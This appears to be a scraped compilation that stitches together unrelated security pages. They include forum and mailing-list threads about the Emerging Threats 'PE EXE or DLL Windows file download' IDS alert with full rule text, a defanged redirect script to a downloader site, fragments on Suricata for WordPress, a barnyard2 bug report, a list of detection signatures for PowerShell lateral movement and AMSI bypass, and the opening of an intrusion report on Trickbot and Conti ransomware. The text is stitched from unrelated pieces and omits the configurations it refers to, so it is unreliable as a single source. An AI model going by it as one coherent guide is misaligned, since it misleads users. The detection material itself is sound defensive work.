I have a UniFi Security Gateway (USG Pro 4P) and just enabled IPS (intrusion prevention system). I am seeing many «ET POLICY PE EXE or DLL Windows file download HTTP» alerts. I have not been able to find any more information on that alert. Should I worry about this alerts or white list it? The destinations are all over the world so I am concerned
asked Jan 31, 2019 at 14:53
0
The «ET POLICY» part of the alert is telling you that it’s a ‘Policy’ rule: i.e. it’s not an attack per se, it’s just something which might violate a corporate policy.
That particular alert is just telling you that someone has downloaded a Windows executable file or DLL over HTTP. In most cases this is just noise, unless you’ve prohibited downloading of executable files in your environment.
answered Jul 1, 2019 at 6:45
Ford
You should contact your provider of your appliance and inform them about the case. On the other hand, you could try to capture (Wireshark, tcpdump, etc) some of the traffic that is generating the issue and try to analyze probably with your appliance provider or by your self. Could be a false positive or your systems or could be under an attack or infected.
answered Jan 31, 2019 at 15:03
camp0camp0
2,1821 gold badge11 silver badges10 bronze badges
0
That is normal to be seen if you have configured .exe filtering. The alert just informs you that it has been a blocked attempt to retrieve an .exe and that is not allowed by the policy.
The actual problem seems to be that the same IP is trying to get the .exes. So if there’s an user there that wants to download something, then just go tell him that what he wants is not allowed. If the system acts by itself, it may be infected with something trying to connect to a download site to further infect your system.
Additional note: the IPs on the list do not appear to be on any C&C blacklists from what I quickly checked.
answered Jul 1, 2019 at 7:00
OvermindOvermind
8,8093 gold badges19 silver badges28 bronze badges
polonus
- Avast Überevangelist
- Probably Bot
-
- Posts: 33489
- malware fighter
-
What is ET POLICY PE EXE or DLL Windows file download threat alert?
« on: September 16, 2014, 06:21:41 PM »
see: https://www.virustotal.com/nl/url/fe20ec02eb19ccdaf0119acd4b1d80021c01d161b49e76edffcc210ec0c8e664/analysis/
and
http://urlquery.net/report.php?id=1410873099312
and http://www.herdprotect.com/ip-address-54.164.159.131.aspx
Verdict there is: Inconclusive.
also for IP IDS alerts for: ET INFO EXE — Served Attached HTTP flow:to_client,established — misc, activity, characteristic for downloader exploits. -PHP 5.3.3 ibase_gen_id() off-by-one Overflow Vulnerability · php. & http://blog.benjaminwalters.net/?p=22139 (info credits: Mu)
http://nginx.org/en/security_advisories.html
Script to dowload video converter ->
Code: [Select]
window.onload = function ()
Still only Emisoft to flag: https://www.virustotal.com/nl/url/05b87e5686488b6a04cc18d7f8e8f2ad84483735668aa1aa561449820f6e56aa/analysis/1410883913/ external link:
{
window.location = 'htxp://www.hdrunnerz.com/yt_downloader_v3?aflt=CD1&mt_aflt=CD5&src=version5';
}
wXw.trustedleadtracking.com/lead/e2c4w274c4w2x2/&aid= benign
[nothing detected] (jsvar) wXw.trustedleadtracking.com/lead/e2c4w274c4w2x2/&aid=
status: (referer=wXw.hdrunnerz.com/v3/js/scripts.js)
[javascript variable] URL=wXCw.trustedleadtracking.com/lead/e2c4w274c4w2x2/&aid=
Please be aware The data shown here represents the data for the parent website trustedleadtracking dot com. As this website is a sub-domain, the actual creator/administrator of the website may be different to this data shown. ..hidden owner.
polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
closed
Potential problem with detecting Windows EXE download
Description
Hi,
I am using SELKS 2.0, recently upgraded, no changes to default settings.
I have noticed something strange with the ET Policy alert related to Windows download.
Basically, if I update one of my Windows box, it downloads around 30 exe/DLL Suricata only generates 2 alerts: 2018959
There should be dozens of alert generated!
On a different NSM using Snort, monitoring the same network I get what is expected an 30 or 40 alerts. the alerts I get are in fact different, they fire rule: 2000419
Something a bit more confusing, If I look for rule 2000419 in Suricata, I can’t find it!
but rule 2018959 does reference rule 2000419 as show here:
scirius.rules:alert http $EXTERNAL_NET any -> $HOME_NET any (msg:»ET POLICY PE EXE or DLL Windows file download HTTP»; flow:established,to_client; flowbits:isnotset,ET.http.binary; file_data; content:»MZ»; within:2; byte_jump:4,58,relative,little; content:»PE|00 00|»; distance:-64; within:4; flowbits:set,ET.http.binary; reference:url,doc.emergingthreats.net/bin/view/Main/2000419; classtype:policy-violation; sid:2018959; rev:2;)
I don’t understand why:
— I can’t find rule 2000419 in Suricata (has it been superseeded by 2018959? but I thought Suricata and Snort were using the same ET rule set
— Why don’t I get all the warnings in Suricata? Is it some kind of setting in /etc/suricata/suricata.yaml? if so could you please help me how to see all the warnings and not just 2?
This is Suricata version 2.1dev (rev 834c366)
Thanks.
B.
Files
- History
- Notes
- Property changes
- File windows_2000419.pcap windows_2000419.pcap added
Issue confirmed and pcap attached.
Using tcpreplay with this pcap triggers alert 2000419 in snort but nothing in Suricata…
I think I noticed the same issue with OSX download not being detected in Suricata either… so might be a bigger problem?
- Tracker changed from Bug to Support
It looks like the issue here is that SELKS (and/or ET) doesn’t enable this rule by default. I don’t know how SELKS handles this, perhaps you can report it to the SELKS project https://github.com/StamusNetworks/SELKS/issues
Thanks Victor, I have just done that and will let you know if it is indeed a problem with SELKS.
But you are right, the rule is just not there…
And 2000419 is different from 2018959, slightly but I suspect enough for not triggering those events!
- Target version deleted (3.0RC1)
- Status changed from New to Closed
Also available in: Atom
PDF
Ian
unread,
Jun 23, 2017, 7:11:41 PM6/23/17
to security-onion
I’ve been trying to figure out how best to deal with the false positives that always show up when there are updates from Microsoft.
The rule is simple enough — just search for the PE header:
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:»ET POLICY PE EXE or DLL Windows file download»; flow:established,to_client; content:»MZ»; byte_jump:4,58,relative,little; content:»PE|00 00|»; distance:-64; within:4; flowbits:set,ET.http.binary; reference:url,doc.emergingthreats.net/bin/view/Main/2000419; classtype:policy-violation; sid:2000419; rev:22;)
What I’d like to do however is exempt something like «Host: au.download.windowsupdate.com» and I’d normally do that by modifying the rule in modifysid.conf, however, when this rule triggers, the captured packet doesn’t have that host line — that host line happens in an earlier separate packet.
Is there a way to reference that host line from a previous packet? Otherwise, how do you guys work around this type of false positive issue?
Doug Burks
unread,
Jun 24, 2017, 4:01:59 AM6/24/17
to securit…@googlegroups.com
Hi Ian,
Technically, this isn’t a false positive, it’s just a «less interesting» EXE
One option here is to disable/suppress this alert altogether and
instead rely on Bro’s EXE detection and then use ELSA to stack the
relevant Bro logs looking for interesting sites. That’s why we
provide by default an ELSA query called «HTTP — Top Sites Hosting
EXEs» because windowsupdate.com, java.com, adobe.com and other
«expected» download sites are going to bubble to the top of the
groupby allowing you to look towards the bottom of the list and find
the more suspicious sites. If you want to look beyond just HTTP
traffic, you can go to «Files — Top MIME Types», then click
«application/x-dosexec», then groupby source, and then drill into the
non-HTTP protocols.
> —
> Follow Security Onion on Twitter!
> https://twitter.com/securityonion
> —
> You received this message because you are subscribed to the Google Groups «security-onion» group.
> To unsubscribe from this group and stop receiving emails from it, send an email to security-onio…@googlegroups.com.
> To post to this group, send email to securit…@googlegroups.com.
> Visit this group at https://groups.google.com/group/security-onion.
> For more options, visit https://groups.google.com/d/optout.
—
Doug Burks
Jon Mark Allen
unread,
Jun 24, 2017, 8:41:32 PM6/24/17
to security-onion
Ian,
I wrote a script to help me with this issue. It doesn’t suppress the alerts, but it does help me triage them quickly. It also includes other SIDs alerting on similar activities.
https://geekcabi.net/article/security-onion-validate-exe-download-alerts/
Assuming I’m satisfied with the results, I can then go back into Squert and acknowledge any of the associated alerts.
The script does cheat a bit, since it’s doing SQL queries in combination with grep’ing the Bro logs. We don’t use ELSA, but once ELK is integrated into the Onion, I’m guessing I won’t need this anymore, but for now it’s worked for me.
HTH,
JM
Ian
unread,
Jun 25, 2017, 8:37:25 PM6/25/17
to security-onion
On Friday, June 23, 2017 at 6:01:59 PM UTC-7, Doug Burks wrote:
> Hi Ian,
>
> Technically, this isn’t a false positive, it’s just a «less interesting» EXE
Doesn’t squert classify a match of this rule as malicious?
Has anyone messed with the flow/stream following that Suricata is supposed to do? I was wondering it is possible to create an additional rule where I can regex for hosts that are reasonably safe and somehow set a flag or variable. Then modify rules like «ET Policy PE EXE or DLL Windows file download» to check for that flag.
Ian
unread,
Jun 25, 2017, 8:45:03 PM6/25/17
to security-onion
Jon,
I’ll take a look at the script, thanks for that, but I’m looking to see if I can solve this in «real-time» if possible.
I did have a question about your grep line that matches for sids to search for. It looks like it matches lines like this:
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:»ETPRO TROJAN Cerber Ransomware Macro EXE Download»; flow:established,to_server; content:»HEAD»; nocase; http_method; content:».mov»; http_uri; pcre:»/.mov$/Ui»; content:»User-Agent|3a 20|Microsoft BITS/»; fast_pattern:7,20; classtype:trojan-activity; sid:2821344; rev:2;)
If a trojan is being downloaded, even from trusted hosts, I’d think I’d want to be notified regardless.
Ian
unread,
Jun 25, 2017, 9:03:20 PM6/25/17
to security-onion
JM
unread,
Jun 25, 2017, 9:51:13 PM6/25/17
to securit…@googlegroups.com
Yes, the grep to identify SIDs would match, but the goal of the script is only to help triage these alerts. I usually only run this script after I’ve already reviewed alerts that jumped out at me (like a Trojan download). But your point is fair.
If you wanted to exclude the ETPRO TROJAN sids, you could modify the grep line:
grep -Ei ‘(exe|dll).*download’ /etc/nsm/rules/*.rules | grep -vi ‘trojan’ | grep -Po ‘sid:[0-9]+’ | cut -f2 -d: > ~/sids
But how would you define hosts «that are reasonably safe»?
If it’s a small set you could set a local rules variable (e.g. SAFE_HOSTS) populated with your safe IPs and use modifysid to s/EXTERNAL_NET/!$SAFE_HOSTS/ and thus exclude those downloads. Of course, that’s not a silver bullet, either.
> «If a trojan is being downloaded, even from trusted hosts, I’d think I’d want to be notified regardless.»
Both flowbits or rule variables are vulnerable to this. If one of your «trusted hosts» were compromised and started serving malware, you still wouldn’t see the alert.
The best real-time solution that doesn’t succumb to this issue is an in-line antivirus/malware scanner/malware sandbox solution, in conjunction with the NIDS. (Not that those are without their problems either…
JM
Ian
unread,
Jun 25, 2017, 10:16:44 PM6/25/17
to security-onion
JM,
Some of the rules are looking for policy violations (This host is downloading executables!), and some are looking for malicious content (This host is downloading a virus (which may be an executable)!).
I’d only use this for the policy violation type rules. The assumption here is that if the exe is something more than an exe, the other rules will still trigger.
On Sunday, June 25, 2017 at 11:51:13 AM UTC-7, Jon Mark Allen wrote:
> But how would you define hosts «that are reasonably safe»?
> Both flowbits or rule variables are vulnerable to this. If one of your «trusted hosts» were compromised and started serving malware, you still wouldn’t see the alert.
Содержание
- Et policy cleartext wordpress login
- Protecting WordPress with Suricata
- whotwagner/suricata
- Launching GitHub Desktop
- Launching GitHub Desktop
- Launching Xcode
- Launching Visual Studio Code
- Latest commit
- Git stats
- Files
- README.md
- About
- timestamp in alert_fast output totally wrong #121
- Comments
- hostingnuggets commented Oct 8, 2014
- binf commented Oct 8, 2014
- hostingnuggets commented Oct 9, 2014
- binf commented Oct 9, 2014
- hostingnuggets commented Oct 10, 2014
- wtfbbqhax commented Oct 27, 2014
- hostingnuggets commented Oct 28, 2014
- binf commented Oct 28, 2014
- hostingnuggets commented Oct 29, 2014
- Name already in use
- suricata-sample-data / samples / wrccdc-2017 / references.md
Et policy cleartext wordpress login
Protecting WordPress with Suricata
There aren’t any silver bullets that will protect a WordPress installation against every single attack, but adding a full featured IDPS solution like Suricata, is a good step in protecting not only that “all too many times vulnerable” WordPress installation but also other services like SSH.
Most WordPress installations are run as a single machine with a complete middleware stack from the web server down to the database. As such, what follows, is based on the following assumptions:
- Middleware stack is already installed, fully functional and based on LEMP
- OS is Enterprise Linux 7 based (minimum version for the Linux Kernel is 3.14)
- HTTP traffic is received using TLS
- Nftables user space tools are installed
- Suricata is already installed (minimum version is 2.1beta3)
- ETOpen rule set as been installed in order for Suricata to use it
- Everything is running in the same host
- The host is a dedicated server or a VPS
The first step is to replace the location section of the server block that listens to HTTPS and passes the requests to PHP, in order to reverse proxy them instead.
Next we need to configure Nginx to listen locally for the decrypted traffic and to pass it to PHP.
After checking that the configuration is correct, restart Nginx. From this point onwards, there should be plain text HTTP traffic flowing to the socket listening locally (generate some traffic if needed). You can confirm this, by using tcpdump .
The next step is to configure Netfilter using Nftables, in order for it to send traffic to Suricata. To do that, create a file with the rules extension under /etc/nftables/ directory.
After starting the Nftables service, the next step is to configure Suricata. First edit the main Suricata configuration file ( /etc/suricata/suricata.yaml ).
Second, edit the system Suricata configuration file ( /etc/sysconfig/suricata ).
After starting Suricata, check that everything worked out without errors and that packets are being received (check the /var/log/suricata/stats.log file). To test the installation, use the following SQLi vector.
If everything worked as planned, Suricata should have created an entry in the EVE log ( /var/log/suricata/eve.json ) reporting the attack.
The next step is to configure the rules to disable false positives:
- 2003508 — ET WEB_SPECIFIC_APPS WordPress wp-login.php redirect_to credentials stealing attempt
- 2012843 — ET POLICY Cleartext WordPress Login
- 2012998 — ET WEB_SERVER PHP Possible https Local File Inclusion Attempt
- 2013505 — ET POLICY GNULinux YUM User-Agent Outbound likely related to package management
And change some useful rules from alert to drop :
- 2001219 — ET SCAN Potential SSH Scan
- 2006546 — ET SCAN LibSSH Based Frequent SSH Connections Likely BruteForce Attack
- 2019876 — ET SCAN SSH BruteForce Tool with fake PUTTY version
- Every rule from:
- ciarmy.rules
- compromised.rules
- drop.rules
- dshield.rules
- emerging-web_server.rules
- emerging-web_specific_apps.rules
Restart Suricata and that’s it. It’s a good idea to update the rules every now and then so that Suricata can better protect WordPress 🙂
Источник
whotwagner/suricata
Use Git or checkout with SVN using the web URL.
Work fast with our official CLI. Learn more.
Launching GitHub Desktop
If nothing happens, download GitHub Desktop and try again.
Launching GitHub Desktop
If nothing happens, download GitHub Desktop and try again.
Launching Xcode
If nothing happens, download Xcode and try again.
Launching Visual Studio Code
Your codespace will open once ready.
There was a problem preparing your codespace, please try again.
Latest commit
Git stats
Files
Failed to load latest commit information.
README.md
This gem offers classes for parsing suricata logfiles. It ships with a nagios-plugin.
Add this line to your application’s Gemfile:
And then execute:
Or install it yourself as:
This gem comes with a Nagios-plugin to search suricata’s fast-logfile for specific strings in the threat-description.
It is possible to interactively acknowlege search hits so that they will not occur on the next search:
This gem comes with a logfile analyzer for suricata’s fast.log. It’s very easy to use and meant for using as a daily cronjob
After checking out the repo, run bin/setup to install dependencies. Then, run rake spec to run the tests. You can also run bin/console for an interactive prompt that will allow you to experiment.
Bug reports and pull requests are welcome on GitHub at https://github.com/whotwagner/suricata.
About
This ruby gem offers classes for parsing suricata logfiles. It ships with a nagios-plugin.
Источник
timestamp in alert_fast output totally wrong #121
The timestamp in the alert_fast output of Barnyard 2.13 is totally wrong outputting random timestamps as you can see below:
Is this a bug or did I maybe misconfigure something? I am using Snort 2.9.6.2.
The text was updated successfully, but these errors were encountered:
Which branch did you use 2-1.13 or 2-1.13-bug-fix-release?
Also note that the logged time comes from the packet time.
void LogTimeStamp(TextLog* log, Packet* p)
<
char timestamp[TIMEBUF_SIZE];
ts_print((struct timeval*)&p->pkth->ts, timestamp);
TextLog_Puts(log, timestamp);
>
On Wed, Oct 8, 2014 at 12:56 PM, Hosting Nuggets notifications@github.com
wrote:
The timestamp in the alert_fast output of Barnyard 2.13 is totally wrong
outputting random timestamps as you can see below:
06/30/125553653-00:55:10. [] [1:2003195:5] ET POLICY Unusual number of DNS No Such Name Responses [] [Classification: Potentially Bad Traffic] [Priority: 2] X.X.X.X:53 -> X.X.X.X:60653
03/20/120794163-02:09:56. [] [1:2012843:2] ET POLICY Cleartext WordPress Login [] [Classification: Potential Corporate Privacy Violation] [Priority: 1] X.X.X.X:59209 -> X.X.X.X:80
Is this a bug or did I maybe misconfigure something? I am using Snort
2.9.6.2.
—
Reply to this email directly or view it on GitHub
#121.
I used the v2-1.13 release (https://github.com/firnsy/barnyard2/archive/v2-1.13.tar.gz) and now just tried out your bug-fix-release as such:
but unfortunately I still get the random dates in the timestamp.
As previously said.
Also note that the logged time comes from the packet time.
void LogTimeStamp(TextLog* log, Packet* p)
<
char timestamp[TIMEBUF_SIZE];
ts_print((struct timeval*)&p->pkth->ts, timestamp);
TextLog_Puts(log, timestamp);
>
On Thu, Oct 9, 2014 at 5:46 AM, Hosting Nuggets notifications@github.com
wrote:
git clone https://github.com/binf/barnyard2
git branch remotes/origin/bug-fix-release
git checkout remotes/origin/bug-fix-release
export AUTOCONF_VERSION=2.69
export AUTOMAKE_VERSION=1.14
./autogen.sh
./configure —with-mysql
make
sudo make install
but unfortunately I still get the random dates in the timestamp.
—
Reply to this email directly or view it on GitHub
#121 (comment).
Sorry I am no developer here. All I know is that on snort side the packet timestamp gets logged correctly but when it gets picked up by barnyard2 ends up all messed up in barnyard2’s alert file.
Here is an example of snort’s alert file which includes the correct timestamp:
Is it possible that the time zones that snort is logging with is different than what barnyard interprets it as?
This would be more likely scenario if they are running under different users. E.g. snort as root and barnyard as hostingnuggets. Where each user has a different configured time zone.
I don’t think it has anything to do with timezone as the timestamp is totally random. As an example here below are the last three entries:
If it was a timezone problem there shouldn’t be such a random pattern in the timestamp.
What is the output you get when you check your unified2 file with u2spewfoo
and u2boat.
Also can you attach a sample u2 file so we can check?
On Tue, Oct 28, 2014 at 9:51 AM, Hosting Nuggets notifications@github.com
wrote:
I don’t think it has anything to do with timezone as the timestamp is
totally random. As an example here below are the last three entries:
06/13-18:20:13.000159 [] [1:2403319:1363] ET CINS Active Threat Intelligence Poor Reputation IP UDP group 10 [] [Classification: Misc Attack] [Priority: 2] X.X.X.X:40000 -> X.X.X.X:88
11/22-14:04:14.000108 [] [1:2000328:12] ET POLICY Outbound Multiple Non-SMTP Server Emails [] [Classification: Misc activity] [Priority: 3] X.X.X.X:46557 -> X.X.X.X:25
09/01-21:23:57.000651 [] [1:2012843:2] ET POLICY Cleartext WordPress Login [] [Classification: Potential Corporate Privacy Violation] [Priority: 1] X.X.X.X:20557 -> X.X.X.X:80
If it was a timezone problem there shouldn’t be such a random pattern in
the timestamp.
—
Reply to this email directly or view it on GitHub
#121 (comment).
Using u2spewfoo I can see the «event second» field of each event incrementing which shows that the timestamps are not random in snort’s unified2 file, example:
Using u2boat I converted an archived snort unified2 file and then had a quick look at it using tcpdump but can’t see any issues there neither with the timestamp as they all increment nicely and have the right date too:
Источник
Name already in use
suricata-sample-data / samples / wrccdc-2017 / references.md
- Go to file T
- Go to line L
- Copy path
- Copy permalink
Copy raw contents
Copy raw contents
sid: 2000355 signature: «ET CHAT IRC authorization message» [ «http://doc.emergingthreats.net/2000355» ]
sid: 2001239 signature: «ET POLICY Cisco Device in Config Mode» [ «http://doc.emergingthreats.net/bin/view/Main/2001239» ]
sid: 2001240 signature: «ET POLICY Cisco Device New Config Built» [ «http://doc.emergingthreats.net/bin/view/Main/2001240» ]
sid: 2001569 signature: «ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection» [ «http://doc.emergingthreats.net/2001569» ]
sid: 2001579 signature: «ET SCAN Behavioral Unusual Port 139 traffic Potential Scan or Infection» [ «http://doc.emergingthreats.net/2001579» ]
sid: 2001580 signature: «ET SCAN Behavioral Unusual Port 137 traffic Potential Scan or Infection» [ «http://doc.emergingthreats.net/2001580» ]
sid: 2001581 signature: «ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection» [ «http://doc.emergingthreats.net/2001581» ]
sid: 2001582 signature: «ET SCAN Behavioral Unusual Port 1434 traffic Potential Scan or Infection» [ «http://doc.emergingthreats.net/2001582» ]
sid: 2001583 signature: «ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection» [ «http://doc.emergingthreats.net/2001583» ]
sid: 2002023 signature: «ET CHAT IRC USER command» [ «http://doc.emergingthreats.net/2002023» ]
sid: 2002024 signature: «ET CHAT IRC NICK command» [ «http://doc.emergingthreats.net/2002024» ]
sid: 2002025 signature: «ET CHAT IRC JOIN command» [ «http://doc.emergingthreats.net/2002025» ]
sid: 2002026 signature: «ET CHAT IRC PRIVMSG command» [ «http://doc.emergingthreats.net/2002026» ]
sid: 2006380 signature: «ET POLICY Outgoing Basic Auth Base64 HTTP Password detected unencrypted» [ «http://doc.emergingthreats.net/bin/view/Main/2006380» ]
sid: 2008119 signature: «ET TFTP Outbound TFTP Error Message» [ «http://doc.emergingthreats.net/2008119» ]
sid: 2008986 signature: «ET POLICY IP Check Domain (whatismyip in HTTP Host)» null
sid: 2010645 signature: «ET POLICY User-Agent (Launcher)» [ «http://doc.emergingthreats.net/2010645» ]
sid: 2012648 signature: «ET POLICY Dropbox Client Broadcasting» null
sid: 2012843 signature: «ET POLICY Cleartext WordPress Login» null
sid: 2012886 signature: «ET POLICY Http Client Body contains passwd= in cleartext» null
sid: 2012887 signature: «ET POLICY Http Client Body contains pass= in cleartext» null
sid: 2012888 signature: «ET POLICY Http Client Body contains pwd= in cleartext» null
sid: 2013031 signature: «ET POLICY Python-urllib/ Suspicious User Agent» [ «http://www.useragentstring.com/pages/useragentstring.php» ]
sid: 2013504 signature: «ET POLICY GNU/Linux APT User-Agent Outbound likely related to package management» [ «http://help.ubuntu.com/community/AptGet/Howto» ]
sid: 2013505 signature: «ET POLICY GNU/Linux YUM User-Agent Outbound likely related to package management» [ «http://www.phy.duke.edu/
sid: 2013721 signature: «ET TROJAN Suspicious User-Agent (WindowsNT) With No Separating Space» null
sid: 2013926 signature: «ET POLICY HTTP traffic on port 443 (POST)» null
sid: 2014726 signature: «ET POLICY Outdated Flash Version M1» [ «http://www.adobe.com/software/flash/about/» ]
sid: 2014799 signature: «ET POLICY OpenVPN Update Check» null
sid: 2014932 signature: «ET POLICY DynDNS CheckIp External IP Address Server Response» null
sid: 2014939 signature: «ET POLICY DNS Query for TOR Hidden Domain .onion Accessible Via TOR» [ «http://en.wikipedia.org/wiki/.onion» ]
sid: 2014941 signature: «ET POLICY TOR .exit Pseudo TLD DNS Query» [ «http://en.wikipedia.org/wiki/.onion» ]
sid: 2015856 signature: «ET SNMP Attempt to retrieve Cisco Config via TFTP (CISCO-CONFIG-COPY)» null
sid: 2016778 signature: «ET DNS Query to a *.pw domain — Likely Hostile» null
sid: 2017025 signature: «ET ATTACK_RESPONSE Net User Command Response» null
sid: 2018170 signature: «ET POLICY Application Crash Report Sent to Microsoft» null
sid: 2018572 signature: «ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families) » null
sid: 2018789 signature: «ET POLICY TLS possible TOR SSL traffic» null
sid: 2018959 signature: «ET POLICY PE EXE or DLL Windows file download HTTP» [ «http://doc.emergingthreats.net/bin/view/Main/2000419» ]
sid: 2019091 signature: «ET EXPLOIT Metasploit Random Base CharCode JS Encoded String» null
sid: 2019232 signature: «ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers» [ «http://blogs.akamai.com/2014/09/environment-bashing.html» ]
sid: 2019236 signature: «ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Version Number» [ «http://blogs.akamai.com/2014/09/environment-bashing.html» ]
sid: 2019239 signature: «ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie» [ «http://blogs.akamai.com/2014/09/environment-bashing.html» ]
sid: 2019512 signature: «ET POLICY Possible IP Check api.ipify.org» null
sid: 2019714 signature: «ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile» null
sid: 2020475 signature: «ET POLICY Metasploit Framework Checking For Update» null
sid: 2020565 signature: «ET POLICY Dropbox DNS Lookup — Possible Offsite File Backup in Use» [ «http://dropbox.com» ]
sid: 2020912 signature: «ET WEB_SERVER Possible IIS Integer Overflow DoS (CVE-2015-1635)» [ «http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1635» ]
sid: 2022114 signature: «ET EXPLOIT Serialized Java Object Calling Common Collection Function» [ «http://github.com/foxglovesec/JavaUnserializeExploits» ]
sid: 2022520 signature: «ET POLICY Possible HTA Application Download» [ «http://www.trustedsec.com/july-2015/malicious-htas/» ]
sid: 2022896 signature: «ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016» null
sid: 2022973 signature: «ET POLICY Possible Kali Linux hostname in DHCP Request Packet» [ «http://www.kali.org» ]
sid: 2024364 signature: «ET SCAN Possible Nmap User-Agent Observed» null
sid: 2024379 signature: «ET POLICY Outdated Flash Version M2» [ «http://www.adobe.com/software/flash/about/» ]
sid: 2024535 signature: «ET CURRENT_EVENTS Possible AMSI Powershell Bypass Attempt B642» null
sid: 2025061 signature: «ET WEB_CLIENT PowerShell call in script 1» null
sid: 2025062 signature: «ET WEB_CLIENT PowerShell call in script 2» null
sid: 2025521 signature: «ET EXPLOIT Cisco Smart Install Exploitation Tool — ChangeConfig» [ «http://www.us-cert.gov/ncas/alerts/TA18-106A», «http://github.com/Sab0tag3d/SIET» ]
sid: 2025699 signature: «ET POLICY SMB Executable File Transfer» null
sid: 2025701 signature: «ET POLICY SMB2 NT Create AndX Request For an Executable File» null
sid: 2025705 signature: «ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File» null
sid: 2025707 signature: «ET POLICY SMB2 NT Create AndX Request For a .bat File» null
sid: 2025709 signature: «ET POLICY SMB2 NT Create AndX Request For a DLL File — Possible Lateral Movement» null
sid: 2025713 signature: «ET POLICY SMB2 Remote AT Scheduled Job Create Request» null
sid: 2025714 signature: «ET POLICY SMB Remote AT Scheduled Job Pipe Creation» null
sid: 2025719 signature: «ET POLICY Powershell Activity Over SMB — Likely Lateral Movement» null
sid: 2025720 signature: «ET POLICY Powershell Command With Hidden Window Argument Over SMB — Likely Lateral Movement» null
sid: 2025722 signature: «ET POLICY Powershell Command With No Profile Argument Over SMB — Likely Lateral Movement» null
sid: 2100230 signature: «GPL CHAT Jabber/Google Talk Outgoing Traffic» [ «http://www.google.com/talk/» ]
sid: 2100232 signature: «GPL CHAT Google Talk Logon» [ «http://www.google.com/talk/» ]
sid: 2100498 signature: «GPL ATTACK_RESPONSE id check returned root» null
sid: 2100877 signature: «GPL CHAT Google Talk Startup» null
sid: 2220000 signature: «SURICATA SMTP invalid reply» null
sid: 2220004 signature: «SURICATA SMTP invalid pipelined sequence» null
sid: 2220006 signature: «SURICATA SMTP no server welcome message» null
sid: 2220007 signature: «SURICATA SMTP tls rejected» null
sid: 2220008 signature: «SURICATA SMTP data command rejected» null
sid: 2221001 signature: «SURICATA HTTP gzip decompression failed» null
sid: 2221002 signature: «SURICATA HTTP request field missing colon» null
sid: 2221003 signature: «SURICATA HTTP invalid request chunk len» null
sid: 2221004 signature: «SURICATA HTTP invalid response chunk len» null
sid: 2221005 signature: «SURICATA HTTP invalid transfer encoding value in request» null
sid: 2221007 signature: «SURICATA HTTP invalid content length field in request» null
sid: 2221009 signature: «SURICATA HTTP status 100-Continue already seen» null
sid: 2221010 signature: «SURICATA HTTP unable to match response to request» null
sid: 2221013 signature: «SURICATA HTTP request header invalid» null
sid: 2221014 signature: «SURICATA HTTP missing Host header» null
sid: 2221015 signature: «SURICATA HTTP Host header ambiguous» null
sid: 2221017 signature: «SURICATA HTTP invalid response field folding» null
sid: 2221020 signature: «SURICATA HTTP response field missing colon» null
sid: 2221021 signature: «SURICATA HTTP response header invalid» null
sid: 2221022 signature: «SURICATA HTTP multipart generic error» null
sid: 2221027 signature: «SURICATA HTTP Host part of URI is invalid» null
sid: 2221028 signature: «SURICATA HTTP Host header invalid» null
sid: 2221030 signature: «SURICATA HTTP METHOD terminated by non-compliant character» null
sid: 2221033 signature: «SURICATA HTTP Request abnormal Content-Encoding header» null
sid: 2230002 signature: «SURICATA TLS invalid record type» null
sid: 2230003 signature: «SURICATA TLS invalid handshake message» null
sid: 2230004 signature: «SURICATA TLS invalid certificate» null
sid: 2230007 signature: «SURICATA TLS certificate invalid length» null
sid: 2230009 signature: «SURICATA TLS error message encountered» null
sid: 2230010 signature: «SURICATA TLS invalid record/traffic» null
sid: 2230012 signature: «SURICATA TLS overflow heartbeat encountered, possible exploit attempt (heartbleed)» [ «http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-0160» ]
sid: 2230015 signature: «SURICATA TLS invalid record version» null
sid: 2230018 signature: «SURICATA TLS invalid SNI length» null
sid: 2230019 signature: «SURICATA TLS handshake invalid length» null
sid: 2240001 signature: «SURICATA DNS Unsolicited response» null
sid: 2240003 signature: «SURICATA DNS malformed response data» null
sid: 2240005 signature: «SURICATA DNS Not a response» null
Источник
Intro
This report will go through an intrusion that went from an Excel file to domain wide ransomware. The threat actors used BazarCall to install Trickbot in the environment which downloaded and executed a Cobalt Strike Beacon. From there the threat actor discovered the internal network before moving laterally to a domain controller for additional discovery. A couple days later, the threat actors came back and executed Conti ransomware across the domain.
Unfamiliar with BazaCall/BazarCall? Read more here from @MsftSecIntel, @dreadphones, & @JCearbhall and here from @Unit42_Intel & @malware_traffic.
Summary
In this intrusion, we observed a number of interesting techniques being leveraged by the threat actors. The threat actors were able to go from initial access to the deployment of Conti ransomware in a matter of hours. The Conti operators chose to wait a couple days before ransoming the environment. Even though most of the techniques aren’t new or advanced, they have proven to be effective. We have observed the same techniques in other intrusions and understanding these techniques will allow defenders to disrupt such intrusion activity and deny it in their own networks.
The Trickbot payload came from a phishing campaign associated with BazarCall, delivering weaponized XLSB files. Upon execution, certutil.exe was copied to %programdata% and renamed with random alphanumeric characters. Certutil was used to download and load the Trickbot DLL into memory. Trickbot was automatically tasked to inject into the wermgr.exe process and use its well-known “pwgrab” module to steal browser credentials. As part of further automated tasking, Trickbot performed an initial reconnaissance of the environment using native Windows tools such as nltest.exe and net.exe.
First hands-on activity was observed two hours after initial compromise, when Trickbot downloaded and executed Cobalt Strike Beacons. To guarantee execution on the beachhead host, multiple payloads were used. One of the Cobalt Strike Beacons was the same payload and command and control infrastructure as used in a prior case. The initial access method for that case was IcedID, which shows that the threat actors utilize various initial access methods to get into environments and accomplish their goals.
Once access through Cobalt Strike was established, the threat actors immediately proceeded with domain enumeration via Nltest, AdFind, BloodHound, and PowerSploit. Presence was then expanded on the beachhead by using a PowerShell loader to execute additional Beacons.
